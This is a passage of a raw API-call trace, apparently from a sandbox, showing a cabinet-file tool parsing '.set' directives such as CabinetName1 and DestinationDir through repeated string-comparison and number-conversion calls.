(_Str="1") returned 1 [0255.606] _vsnprintf (in: _DstBuf=0x27e87fd520, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fd488 | out: _DstBuf="DiskDirectory1") returned 14 [0255.606] atoi (_Str="1") returned 1 [0255.606] _strcmpi (_Str1="Cabinet", _Str2="DiskDirectory1") returned -1 [0255.606] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DiskDirectory1") returned -1 [0255.606] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DiskDirectory1") returned -1 [0255.606] _strcmpi (_Str1="ChecksumWidth", _Str2="DiskDirectory1") returned -1 [0255.606] _strcmpi (_Str1="ClusterSize", _Str2="DiskDirectory1") returned -1 [0255.606] _strcmpi (_Str1="Compress", _Str2="DiskDirectory1") returned -1 [0255.606] _strcmpi (_Str1="LongSourceFileNames", _Str2="DiskDirectory1") returned 8 [0255.606] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DiskDirectory1") returned -1 [0255.606] _strcmpi (_Str1="CompressionType", _Str2="DiskDirectory1") returned -1 [0255.606] _strcmpi (_Str1="CompressionLevel", _Str2="DiskDirectory1") returned -1 [0255.606] _strcmpi (_Str1="CompressionMemory", _Str2="DiskDirectory1") returned -1 [0255.606] _strcmpi (_Str1="DestinationDir", _Str2="DiskDirectory1") returned -4 [0255.606] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="DiskDirectory1") returned 67 [0255.606] _strcmpi (_Str1="DiskLabelTemplate", _Str2="DiskDirectory1") returned 8 [0255.606] _strcmpi (_Str1="DoNotCopyFiles", _Str2="DiskDirectory1") returned 6 [0255.606] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="DiskDirectory1") returned 2 [0255.606] _strcmpi (_Str1="FolderSizeThreshold", _Str2="DiskDirectory1") returned 2 [0255.606] _strcmpi (_Str1="GenerateInf", _Str2="DiskDirectory1") returned 3 [0255.606] _strcmpi (_Str1="InfCabinetHeader", _Str2="DiskDirectory1") returned 5 [0255.606] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="DiskDirectory1") returned 5 [0255.606] _strcmpi (_Str1="InfCommentString", _Str2="DiskDirectory1") returned 5 [0255.606] _strcmpi (_Str1="InfDateFormat", _Str2="DiskDirectory1") returned 5 [0255.606] _strcmpi (_Str1="InfDiskHeader", _Str2="DiskDirectory1") returned 5 [0255.606] _strcmpi (_Str1="InfDiskLineFormat", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfFileHeader", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfFileLineFormat", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfFileName", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfFooter", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfFooter1", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfFooter2", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfFooter3", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfFooter4", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfHeader", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfHeader1", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfHeader2", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfHeader3", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfHeader4", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfHeader5", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfHeader6", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="InfSectionOrder", _Str2="DiskDirectory1") returned 5 [0255.607] _strcmpi (_Str1="MaxCabinetSize", _Str2="DiskDirectory1") returned 9 [0255.607] _strcmpi (_Str1="MaxDiskFileCount", _Str2="DiskDirectory1") returned 9 [0255.607] _strcmpi (_Str1="MaxDiskSize", _Str2="DiskDirectory1") returned 9 [0255.607] _strcmpi (_Str1="MaxErrors", _Str2="DiskDirectory1") returned 9 [0255.607] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="DiskDirectory1") returned 14 [0255.607] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="DiskDirectory1") returned 14 [0255.607] _strcmpi (_Str1="ReservePerFolderSize", _Str2="DiskDirectory1") returned 14 [0255.607] _strcmpi (_Str1="RptFileName", _Str2="DiskDirectory1") returned 14 [0255.607] _strcmpi (_Str1="SourceDir", _Str2="DiskDirectory1") returned 15 [0255.607] _strcmpi (_Str1="UniqueFiles", _Str2="DiskDirectory1") returned 17 [0255.607] atoi (_Str="1") returned 1 [0255.607] _vsnprintf (in: _DstBuf=0x27e87fd2b0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fd218 | out: _DstBuf="DiskDirectory1") returned 14 [0255.607] atoi (_Str="1") returned 1 [0255.607] _strcmpi (_Str1="DiskDirectory1", _Str2="MaxDiskSize") returned -9 [0255.607] _strcmpi (_Str1="DiskDirectory1", _Str2="GenerateInf") returned -3 [0255.607] strpbrk (_Str=".set CabinetName1=\"2314.bin\"", _Control=" \x09") returned=" CabinetName1=\"2314.bin\"" [0255.607] strspn (_Str=" CabinetName1=\"2314.bin\"", _Control=" \x09") returned 0x1 [0255.607] strpbrk (_Str="CabinetName1=\"2314.bin\"", _Control=" \x09") returned 0x0 [0255.607] strspn (_Str=".set CabinetName1=\"2314.bin\"", _Control=" \x09") returned 0x0 [0255.607] strspn (_Str=".set CabinetName1=\"2314.bin\"", _Control=" \x09") returned 0x0 [0255.608] strpbrk (_Str="set CabinetName1=\"2314.bin\"", _Control=" \x09") returned=" CabinetName1=\"2314.bin\"" [0255.608] _strcmpi (_Str1="Define", _Str2="set") returned -15 [0255.608] _strcmpi (_Str1="Delete", _Str2="set") returned -15 [0255.608] _strcmpi (_Str1="Dump", _Str2="set") returned -15 [0255.608] _strcmpi (_Str1="InfBegin", _Str2="set") returned -10 [0255.608] _strcmpi (_Str1="InfEnd", _Str2="set") returned -10 [0255.608] _strcmpi (_Str1="InfWrite", _Str2="set") returned -10 [0255.608] _strcmpi (_Str1="InfWriteCabinet", _Str2="set") returned -10 [0255.608] _strcmpi (_Str1="InfWriteDisk", _Str2="set") returned -10 [0255.608] _strcmpi (_Str1="New", _Str2="set") returned -5 [0255.608] _strcmpi (_Str1="Option", _Str2="set") returned -4 [0255.608] _strcmpi (_Str1="Set", _Str2="set") returned 0 [0255.608] strspn (_Str=" CabinetName1=\"2314.bin\"", _Control=" \x09") returned 0x1 [0255.608] strpbrk (_Str="CabinetName1=\"2314.bin\"", _Control="= \x09") returned="=\"2314.bin\"" [0255.608] strspn (_Str="=\"2314.bin\"", _Control=" \x09") returned 0x0 [0255.608] strspn (_Str="\"2314.bin\"", _Control=" \x09") returned 0x0 [0255.608] strspn (_Str="", _Control=" \x09") returned 0x0 [0255.608] _strcmpi (_Str1="2314.bin", _Str2="360K") returned -1 [0255.608] atol (_Str="362496") returned 362496 [0255.608] atol (_Str="2314.bin") returned 2314 [0255.608] _strcmpi (_Str1="2314.bin", _Str2="720K") returned -5 [0255.609] atol (_Str="730112") returned 730112 [0255.609] atol (_Str="2314.bin") returned 2314 [0255.609] _strcmpi (_Str1="2314.bin", _Str2="1.2M") returned 1 [0255.611] atol (_Str="1213952") returned 1213952 [0255.611] atol (_Str="2314.bin") returned 2314 [0255.611] _strcmpi (_Str1="2314.bin", _Str2="1.25M") returned 1 [0255.611] atol (_Str="1250304") returned 1250304 [0255.611] atol (_Str="2314.bin") returned 2314 [0255.611] _strcmpi (_Str1="2314.bin", _Str2="1.44M") returned 1 [0255.611] atol (_Str="1457664") returned 1457664 [0255.611] atol (_Str="2314.bin") returned 2314 [0255.611] _strcmpi (_Str1="2314.bin", _Str2="1.68M") returned 1 [0255.611] atol (_Str="1716224") returned 1716224 [0255.611] atol (_Str="2314.bin") returned 2314 [0255.611] _strcmpi (_Str1="2314.bin", _Str2="DMF168") returned -50 [0255.611] atol (_Str="1716224") returned 1716224 [0255.611] atol (_Str="2314.bin") returned 2314 [0255.611] _strcmpi (_Str1="2314.bin", _Str2="CDROM") returned -49 [0255.611] atol (_Str="681984000") returned 681984000 [0255.611] atol (_Str="2314.bin") returned 2314 [0255.611] _strcmpi (_Str1="Cabinet", _Str2="CabinetName1") returned -110 [0255.611] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CabinetName1") returned -8 [0255.611] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CabinetName1") returned 67 [0255.611] _strcmpi (_Str1="ChecksumWidth", _Str2="CabinetName1") returned 7 [0255.614] _strcmpi (_Str1="ClusterSize", _Str2="CabinetName1") returned 11 [0255.615] _strcmpi (_Str1="Compress", _Str2="CabinetName1") returned 14 [0255.615] _strcmpi (_Str1="LongSourceFileNames", _Str2="CabinetName1") returned 9 [0255.619] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CabinetName1") returned 14 [0255.619] _strcmpi (_Str1="CompressionType", _Str2="CabinetName1") returned 14 [0255.619] _strcmpi (_Str1="CompressionLevel", _Str2="CabinetName1") returned 14 [0255.619] _strcmpi (_Str1="CompressionMemory", _Str2="CabinetName1") returned 14 [0255.619] _strcmpi (_Str1="DestinationDir", _Str2="CabinetName1") returned 1 [0255.619] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="CabinetName1") returned 1 [0255.619] _strcmpi (_Str1="DiskLabelTemplate", _Str2="CabinetName1") returned 1 [0255.619] _strcmpi (_Str1="DoNotCopyFiles", _Str2="CabinetName1") returned 1 [0255.619] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="CabinetName1") returned 3 [0255.619] _strcmpi (_Str1="FolderSizeThreshold", _Str2="CabinetName1") returned 3 [0255.619] _strcmpi (_Str1="GenerateInf", _Str2="CabinetName1") returned 4 [0255.619] _strcmpi (_Str1="InfCabinetHeader", _Str2="CabinetName1") returned 6 [0255.619] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="CabinetName1") returned 6 [0255.619] _strcmpi (_Str1="InfCommentString", _Str2="CabinetName1") returned 6 [0255.619] _strcmpi (_Str1="InfDateFormat", _Str2="CabinetName1") returned 6 [0255.619] _strcmpi (_Str1="InfDiskHeader", _Str2="CabinetName1") returned 6 [0255.619] _strcmpi (_Str1="InfDiskLineFormat", _Str2="CabinetName1") returned 6 [0255.619] _strcmpi (_Str1="InfFileHeader", _Str2="CabinetName1") returned 6 [0255.619] _strcmpi (_Str1="InfFileLineFormat", _Str2="CabinetName1") returned 6 [0255.619] _strcmpi (_Str1="InfFileName", _Str2="CabinetName1") returned 6 [0255.619] _strcmpi (_Str1="InfFooter", _Str2="CabinetName1") returned 6 [0255.619] _strcmpi (_Str1="InfFooter1", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfFooter2", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfFooter3", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfFooter4", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfHeader", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfHeader1", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfHeader2", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfHeader3", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfHeader4", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfHeader5", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfHeader6", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="InfSectionOrder", _Str2="CabinetName1") returned 6 [0255.620] _strcmpi (_Str1="MaxCabinetSize", _Str2="CabinetName1") returned 10 [0255.620] _strcmpi (_Str1="MaxDiskFileCount", _Str2="CabinetName1") returned 10 [0255.620] _strcmpi (_Str1="MaxDiskSize", _Str2="CabinetName1") returned 10 [0255.620] _strcmpi (_Str1="MaxErrors", _Str2="CabinetName1") returned 10 [0255.620] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="CabinetName1") returned 15 [0255.620] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="CabinetName1") returned 15 [0255.620] _strcmpi (_Str1="ReservePerFolderSize", _Str2="CabinetName1") returned 15 [0255.620] _strcmpi (_Str1="RptFileName", _Str2="CabinetName1") returned 15 [0255.620] _strcmpi (_Str1="SourceDir", _Str2="CabinetName1") returned 16 [0255.620] _strcmpi (_Str1="UniqueFiles", _Str2="CabinetName1") returned 18 [0255.620] _strcmpi (_Str1="DiskDirectory1", _Str2="CabinetName1") returned 1 [0255.620] atoi (_Str="1") returned 1 [0255.620] _vsnprintf (in: _DstBuf=0x27e87fd520, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fd488 | out: _DstBuf="CabinetName1") returned 12 [0255.620] atoi (_Str="1") returned 1 [0255.620] _strcmpi (_Str1="Cabinet", _Str2="CabinetName1") returned -110 [0255.620] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CabinetName1") returned -8 [0255.620] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CabinetName1") returned 67 [0255.620] _strcmpi (_Str1="ChecksumWidth", _Str2="CabinetName1") returned 7 [0255.620] _strcmpi (_Str1="ClusterSize", _Str2="CabinetName1") returned 11 [0255.620] _strcmpi (_Str1="Compress", _Str2="CabinetName1") returned 14 [0255.620] _strcmpi (_Str1="LongSourceFileNames", _Str2="CabinetName1") returned 9 [0255.620] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CabinetName1") returned 14 [0255.620] _strcmpi (_Str1="CompressionType", _Str2="CabinetName1") returned 14 [0255.620] _strcmpi (_Str1="CompressionLevel", _Str2="CabinetName1") returned 14 [0255.620] _strcmpi (_Str1="CompressionMemory", _Str2="CabinetName1") returned 14 [0255.620] _strcmpi (_Str1="DestinationDir", _Str2="CabinetName1") returned 1 [0255.620] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="CabinetName1") returned 1 [0255.620] _strcmpi (_Str1="DiskLabelTemplate", _Str2="CabinetName1") returned 1 [0255.620] _strcmpi (_Str1="DoNotCopyFiles", _Str2="CabinetName1") returned 1 [0255.620] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="CabinetName1") returned 3 [0255.621] _strcmpi (_Str1="FolderSizeThreshold", _Str2="CabinetName1") returned 3 [0255.621] _strcmpi (_Str1="GenerateInf", _Str2="CabinetName1") returned 4 [0255.621] _strcmpi (_Str1="InfCabinetHeader", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfCommentString", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfDateFormat", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfDiskHeader", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfDiskLineFormat", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfFileHeader", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfFileLineFormat", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfFileName", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfFooter", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfFooter1", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfFooter2", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfFooter3", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfFooter4", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfHeader", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfHeader1", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfHeader2", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfHeader3", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfHeader4", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfHeader5", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfHeader6", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="InfSectionOrder", _Str2="CabinetName1") returned 6 [0255.621] _strcmpi (_Str1="MaxCabinetSize", _Str2="CabinetName1") returned 10 [0255.621] _strcmpi (_Str1="MaxDiskFileCount", _Str2="CabinetName1") returned 10 [0255.621] _strcmpi (_Str1="MaxDiskSize", _Str2="CabinetName1") returned 10 [0255.621] _strcmpi (_Str1="MaxErrors", _Str2="CabinetName1") returned 10 [0255.621] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="CabinetName1") returned 15 [0255.621] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="CabinetName1") returned 15 [0255.621] _strcmpi (_Str1="ReservePerFolderSize", _Str2="CabinetName1") returned 15 [0255.621] _strcmpi (_Str1="RptFileName", _Str2="CabinetName1") returned 15 [0255.621] _strcmpi (_Str1="SourceDir", _Str2="CabinetName1") returned 16 [0255.621] _strcmpi (_Str1="UniqueFiles", _Str2="CabinetName1") returned 18 [0255.621] _strcmpi (_Str1="DiskDirectory1", _Str2="CabinetName1") returned 1 [0255.621] atoi (_Str="1") returned 1 [0255.621] _vsnprintf (in: _DstBuf=0x27e87fd2b0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fd218 | out: _DstBuf="CabinetName1") returned 12 [0255.621] atoi (_Str="1") returned 1 [0255.622] _strcmpi (_Str1="CabinetName1", _Str2="MaxDiskSize") returned -10 [0255.622] _strcmpi (_Str1="CabinetName1", _Str2="GenerateInf") returned -4 [0255.622] strpbrk (_Str=".set DestinationDir=\"\"", _Control=" \x09") returned=" DestinationDir=\"\"" [0255.622] strspn (_Str=" DestinationDir=\"\"", _Control=" \x09") returned 0x1 [0255.622] strpbrk (_Str="DestinationDir=\"\"", _Control=" \x09") returned 0x0 [0255.622] strspn (_Str=".set DestinationDir=\"\"", _Control=" \x09") returned 0x0 [0255.622] strspn (_Str=".set DestinationDir=\"\"", _Control=" \x09") returned 0x0 [0255.622] strpbrk (_Str="set DestinationDir=\"\"", _Control=" \x09") returned=" DestinationDir=\"\"" [0255.622] _strcmpi (_Str1="Define", _Str2="set") returned -15 [0255.622] _strcmpi (_Str1="Delete", _Str2="set") returned -15 [0255.622] _strcmpi (_Str1="Dump", _Str2="set") returned -15 [0255.622] _strcmpi (_Str1="InfBegin", _Str2="set") returned -10 [0255.622] _strcmpi (_Str1="InfEnd", _Str2="set") returned -10 [0255.622] _strcmpi (_Str1="InfWrite", _Str2="set") returned -10 [0255.622] _strcmpi (_Str1="InfWriteCabinet", _Str2="set") returned -10 [0255.622] _strcmpi (_Str1="InfWriteDisk", _Str2="set") returned -10 [0255.622] _strcmpi (_Str1="New", _Str2="set") returned -5 [0255.622] _strcmpi (_Str1="Option", _Str2="set") returned -4 [0255.622] _strcmpi (_Str1="Set", _Str2="set") returned 0 [0255.622] strspn (_Str=" DestinationDir=\"\"", _Control=" \x09") returned 0x1 [0255.622] strpbrk (_Str="DestinationDir=\"\"", _Control="= \x09") returned="=\"\"" [0255.622] strspn (_Str="=\"\"", _Control=" \x09") returned 0x0 [0255.622] strspn (_Str="\"\"", _Control=" \x09") returned 0x0 [0255.622] strspn (_Str="", _Control=" \x09") returned 0x0 [0255.622] _strcmpi (_Str1="", _Str2="360K") returned -51 [0255.622] atol (_Str="362496") returned 362496 [0255.622] atol (_Str="") returned 0 [0255.622] _strcmpi (_Str1="", _Str2="720K") returned -55 [0255.622] atol (_Str="730112") returned 730112 [0255.622] atol (_Str="") returned 0 [0255.622] _strcmpi (_Str1="", _Str2="1.2M") returned -49 [0255.622] atol (_Str="1213952") returned 1213952 [0255.622] atol (_Str="") returned 0 [0255.622] _strcmpi (_Str1="", _Str2="1.25M") returned -49 [0255.622] atol (_Str="1250304") returned 1250304 [0255.622] atol (_Str="") returned 0 [0255.623] _strcmpi (_Str1="", _Str2="1.44M") returned -49 [0255.623] atol (_Str="1457664") returned 1457664 [0255.623] atol (_Str="") returned 0 [0255.623] _strcmpi (_Str1="", _Str2="1.68M") returned -49 [0255.623] atol (_Str="1716224") returned 1716224 [0255.623] atol (_Str="") returned 0 [0255.623] _strcmpi (_Str1="", _Str2="DMF168") returned -100 [0255.623] atol (_Str="1716224") returned 1716224 [0255.623] atol (_Str="") returned 0 [0255.623] _strcmpi (_Str1="", _Str2="CDROM") returned -99 [0255.623] atol (_Str="681984000") returned 681984000 [0255.623] atol (_Str="") returned 0 [0255.623] _strcmpi (_Str1="Cabinet", _Str2="DestinationDir") returned -1 [0255.623] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DestinationDir") returned -1 [0255.623] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DestinationDir") returned -1 [0255.623] _strcmpi (_Str1="ChecksumWidth", _Str2="DestinationDir") returned -1 [0255.623] _strcmpi (_Str1="ClusterSize", _Str2="DestinationDir") returned -1 [0255.623] _strcmpi (_Str1="Compress", _Str2="DestinationDir") returned -1 [0255.623] _strcmpi (_Str1="LongSourceFileNames", _Str2="DestinationDir") returned 8 [0255.623] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DestinationDir") returned -1 [0255.623] _strcmpi (_Str1="CompressionType", _Str2="DestinationDir") returned -1 [0255.623] _strcmpi (_Str1="CompressionLevel", _Str2="DestinationDir") returned -1 [0255.623] _strcmpi (_Str1="CompressionMemory", _Str2="DestinationDir") returned -1 [0255.625] _strcmpi (_Str1="DestinationDir", _Str2="DestinationDir") returned 0 [0255.625] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskSize") returned -9 [0255.633] _strcmpi (_Str1="DestinationDir", _Str2="GenerateInf") returned -3 [0255.637] strpbrk (_Str="\"01D4756785E0F97F09\"", _Control=" \x09") returned 0x0 [0255.641] strspn (_Str="\"01D4756785E0F97F09\"", _Control=" \x09") returned 0x0 [0255.642] strspn (_Str="\"01D4756785E0F97F09\"", _Control=" \x09") returned 0x0 [0255.642] _strcmpi (_Str1="Cabinet", _Str2="LongSourceFileNames") returned -9 [0255.642] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="LongSourceFileNames") returned -9 [0255.642] _strcmpi (_Str1="CabinetNameTemplate", _Str2="LongSourceFileNames") returned -9 [0255.642] _strcmpi (_Str1="ChecksumWidth", _Str2="LongSourceFileNames") returned -9 [0255.642] _strcmpi (_Str1="ClusterSize", _Str2="LongSourceFileNames") returned -9 [0255.642] _strcmpi (_Str1="Compress", _Str2="LongSourceFileNames") returned -9 [0255.642] _strcmpi (_Str1="LongSourceFileNames", _Str2="LongSourceFileNames") returned 0 [0255.642] atoi (_Str="0") returned 0 [0255.642] _strcmpi (_Str1="Cabinet", _Str2="GenerateInf") returned -4 [0255.642] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="GenerateInf") returned -4 [0255.642] _strcmpi (_Str1="CabinetNameTemplate", _Str2="GenerateInf") returned -4 [0255.643] _strcmpi (_Str1="ChecksumWidth", _Str2="GenerateInf") returned -4 [0255.643] _strcmpi (_Str1="ClusterSize", _Str2="GenerateInf") returned -4 [0255.643] _strcmpi (_Str1="Compress", _Str2="GenerateInf") returned -4 [0255.643] _strcmpi (_Str1="LongSourceFileNames", _Str2="GenerateInf") returned 5 [0255.643] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="GenerateInf") returned -4 [0255.643] _strcmpi (_Str1="CompressionType", _Str2="GenerateInf") returned -4 [0255.643] _strcmpi (_Str1="CompressionLevel", _Str2="GenerateInf") returned -4 [0255.643] _strcmpi (_Str1="CompressionMemory", _Str2="GenerateInf") returned -4 [0255.643] _strcmpi (_Str1="DestinationDir", _Str2="GenerateInf") returned -3 [0255.643] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="GenerateInf") returned -3 [0255.643] _strcmpi (_Str1="DiskLabelTemplate", _Str2="GenerateInf") returned -3 [0255.643] _strcmpi (_Str1="DoNotCopyFiles", _Str2="GenerateInf") returned -3 [0255.643] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="GenerateInf") returned -1 [0255.643] _strcmpi (_Str1="FolderSizeThreshold", _Str2="GenerateInf") returned -1 [0255.643] _strcmpi (_Str1="GenerateInf", _Str2="GenerateInf") returned 0 [0255.643] atoi (_Str="1") returned 1 [0255.643] _strcmpi (_Str1="Cabinet", _Str2="SourceDir") returned -16 [0255.643] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="SourceDir") returned -16 [0255.643] _strcmpi (_Str1="CabinetNameTemplate", _Str2="SourceDir") returned -16 [0255.643] _strcmpi (_Str1="ChecksumWidth", _Str2="SourceDir") returned -16 [0255.643] _strcmpi (_Str1="ClusterSize", _Str2="SourceDir") returned -16 [0255.643] _strcmpi (_Str1="Compress", _Str2="SourceDir") returned -16 [0255.643] _strcmpi (_Str1="LongSourceFileNames", _Str2="SourceDir") returned -7 [0255.643] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="SourceDir") returned -16 [0255.643] _strcmpi (_Str1="CompressionType", _Str2="SourceDir") returned -16 [0255.643] _strcmpi (_Str1="CompressionLevel", _Str2="SourceDir") returned -16 [0255.643] _strcmpi (_Str1="CompressionMemory", _Str2="SourceDir") returned -16 [0255.643] _strcmpi (_Str1="DestinationDir", _Str2="SourceDir") returned -15 [0255.643] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="SourceDir") returned -15 [0255.643] _strcmpi (_Str1="DiskLabelTemplate", _Str2="SourceDir") returned -15 [0255.643] _strcmpi (_Str1="DoNotCopyFiles", _Str2="SourceDir") returned -15 [0255.643] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="SourceDir") returned -13 [0255.643] _strcmpi (_Str1="FolderSizeThreshold", _Str2="SourceDir") returned -13 [0255.643] _strcmpi (_Str1="GenerateInf", _Str2="SourceDir") returned -12 [0255.643] _strcmpi (_Str1="InfCabinetHeader", _Str2="SourceDir") returned -10 [0255.643] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="SourceDir") returned -10 [0255.643] _strcmpi (_Str1="InfCommentString", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfDateFormat", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfDiskHeader", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfDiskLineFormat", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfFileHeader", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfFileLineFormat", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfFileName", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfFooter", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfFooter1", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfFooter2", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfFooter3", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfFooter4", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfHeader", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfHeader1", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfHeader2", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfHeader3", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfHeader4", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfHeader5", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfHeader6", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="InfSectionOrder", _Str2="SourceDir") returned -10 [0255.644] _strcmpi (_Str1="MaxCabinetSize", _Str2="SourceDir") returned -6 [0255.644] _strcmpi (_Str1="MaxDiskFileCount", _Str2="SourceDir") returned -6 [0255.644] _strcmpi (_Str1="MaxDiskSize", _Str2="SourceDir") returned -6 [0255.644] _strcmpi (_Str1="MaxErrors", _Str2="SourceDir") returned -6 [0255.644] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="SourceDir") returned -1 [0255.644] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="SourceDir") returned -1 [0255.644] _strcmpi (_Str1="ReservePerFolderSize", _Str2="SourceDir") returned -1 [0255.644] _strcmpi (_Str1="RptFileName", _Str2="SourceDir") returned -1 [0255.644] _strcmpi (_Str1="SourceDir", _Str2="SourceDir") returned 0 [0255.644] _strcmpi (_Str1="Cabinet", _Str2="DestinationDir") returned -1 [0255.644] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DestinationDir") returned -1 [0255.644] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DestinationDir") returned -1 [0255.644] _strcmpi (_Str1="ChecksumWidth", _Str2="DestinationDir") returned -1 [0255.644] _strcmpi (_Str1="ClusterSize", _Str2="DestinationDir") returned -1 [0255.644] _strcmpi (_Str1="Compress", _Str2="DestinationDir") returned -1 [0255.644] _strcmpi (_Str1="LongSourceFileNames", _Str2="DestinationDir") returned 8 [0255.644] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DestinationDir") returned -1 [0255.644] _strcmpi (_Str1="CompressionType", _Str2="DestinationDir") returned -1 [0255.645] _strcmpi (_Str1="CompressionLevel", _Str2="DestinationDir") returned -1 [0255.645] _strcmpi (_Str1="CompressionMemory", 